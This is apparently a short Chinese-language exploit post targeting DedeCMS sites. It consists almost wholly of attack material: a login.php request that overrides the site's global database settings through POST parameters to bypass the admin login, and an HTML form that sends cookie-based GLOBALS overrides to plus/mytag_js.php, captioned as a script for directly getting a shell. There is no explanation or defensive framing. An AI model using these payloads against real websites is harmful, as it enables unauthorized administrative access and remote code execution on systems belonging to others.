login.php
?dopost=login
&validate=验证码
&userid=admin
&pwd=admin
&_POST[GLOBALS][cfg_dbhost]=*.*.*.*
&_POST[GLOBALS][cfg_dbuser]=root
&_POST[GLOBALS][cfg_dbpwd]=*****
&_POST[GLOBALS][cfg_dbname]=db_name
&_POST[GLOBALS][cfg_dbprefix]=dede_
&_POST[GLOBALS][cfg_db_language]=gbk //根据自己的cms选择 utf8不需要带入
后台登录
—————————————————————————–
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://localhost:8080/plus/mytag_js.php?aid=1" name="doaction"
style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br
/>
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
直接拿shell 的脚本
0 条评论。